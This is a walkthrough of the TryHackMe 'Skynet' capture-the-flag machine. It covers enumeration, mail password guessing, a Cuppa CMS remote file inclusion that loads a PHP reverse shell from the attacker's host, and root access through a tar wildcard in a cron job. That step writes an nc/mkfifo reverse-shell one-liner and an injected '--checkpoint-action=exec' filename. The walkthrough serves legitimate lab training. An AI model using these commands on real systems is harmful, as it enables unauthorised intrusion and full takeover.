Table of contents
Skynet is the fifth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path
Enumeration
Let’s start with the nmap scan:
nmap -sC -sV -o nmap.txt <target_ip>
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
143/tcp open imap Dovecot imapd
As there is a port 80 open, let’s also run the gobuster:
gobuster dir -u http://<target_ip> -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://<target_ip>
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/19 03:58:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2020/10/19 03:58:57 Finished
===============================================================
We discovered /squirrelmail directory, but it required authorization.
Let’s enumerate more! We still have services that we didn’t check yet. What about smb?
smbmap -H <target_ip>
[+] Guest session IP: <target_ip>:445 Name: <target_ip>
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
It seems that only anonymous is readable without authorization. It’s a good idea to check what is inside:
smbclient \\\\<target_ip>\\anonymous
smb: \> ls
. D 0 Wed Sep 18 00:41:20 2019
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
books D 0 Wed Sep 18 00:40:06 2019
9204224 blocks of size 1024. 5373504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Wed Sep 18 00:41:20 2019
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
The content of attention.txt is:
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Only log1.txt in the \logs is worth looking, as it contains a list of possible passwords:
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
A short sum-up of the enumeration phase:
we have
milesdysonas a potential usernamewe have the list of potential passwords
we have two places to try them out:
sshandsquirrel mail
It less likely that ssh will be our way in, so let’s give squirrel mail a try.
Try to find the correct password for user milesdyson on http://<target_ip>/squirrelmail/src/login.php.
I used Burp Suite for that, Hydra would also do the trick, but you can do it manually, it will not take long. wink
Alright, we are in! Let’s check the emails.
One of them is very interesting, others are useless.
The email with the subject Samba Password reset will cough your eye immediately:
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
This email was sent from skynet@skynet to the milesdyson, so now we have the password from smb share!
Login to the smb with this password and look around.
You will find the file that pointing out that something interesting can be found at the /45kra24zxs28v3yd.
We didn’t find that directory in the smb, let’s check, maybe it’s on port 80?
Navigate to the http://<target_ip>/45kra24zxs28v3yd/ and check what’s there.
Not so useful, huh?
Fire up your gobuster one more time:
gobuster dir -u http://<target_ip>/45kra24zxs28v3yd/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://<target_ip>/45kra24zxs28v3yd/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/19 04:21:37 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2020/10/19 04:21:58 Finished
===============================================================
Yet another vector! The /administrator directory leads us to the login form of the Cuppa CMS. Unfortunately, the credentials that we already have will not work here.
Let’s look for other ways in.
We don’t know the version of the Cuppa CMS, but it will not harm anyone if we will check for the available exploits.
\> Exploitation
searchsploit cuppa
Cuppa CMS - '/alertConfigField.php' Local/Remote File | php/webapps/25971.txt
We have only one RFI. As we don’t have any other ideas, let’s try it out:
Grab a copy of php-reverse-shell.php from PentestMonkey, specify your IP and port.
Open nc listener:
sudo nc -nlvp 1337
Open the web server in the folder with your reverse shell:
sudo python -m SimpleHTTPServer 80
Finally, let’s trigger the exploit itself:
http://<target_ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<your_ip>/php-reverse-shell.php
Catch your shell!
You can upgrade your shell by
/usr/bin/script -qc /bin/bash /dev/null
\> PrivEsc
Transport your favorite tool for privilege escalations to the machine. As we already have SimpleHTTPServer on port 80 you can use it.
cd to the folder where you have access to writing (/tmp for instance) and download the tool.
I will use Linux Smart Enumeration this time:
www-data@skynet:/tmp$ wget http://<your_ip>/lse.sh
www-data@skynet:/tmp$ chmod +x lse.sh
www-data@skynet:/tmp$ ./lse.sh
lse has a great -l flag, which allows you to specify how many details will be shown. I can recommend starting without it, and if you will not find anything useful, run lse.sh again with -l 1, -l 2 or -l 3 accordingly.
You will eventually spot the CRON job is running on /home/milesdyson/backups/backup.sh. Let’s investigate:
www-data@skynet:/tmp$ ls -la /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17 2019 /home/milesdyson/backups/backup.sh
www-data@skynet:/tmp$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
So, we can’t edit the file, but what we can do, is the exploitation of the wildcard in the script.
You can read more about this vulnerability here.
Navigate to the /var/www/html and do the following:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
Wait for a CRON job to execute your shell.sh.
Catch the root shell!
\> Takeaway
Enumeration can easily take half of the time of work on the machine.
“Connecting the dots” is a useful skill for penetration testing.
Take your time with the exploitation of the
CRONjobs, can take a while to be executed.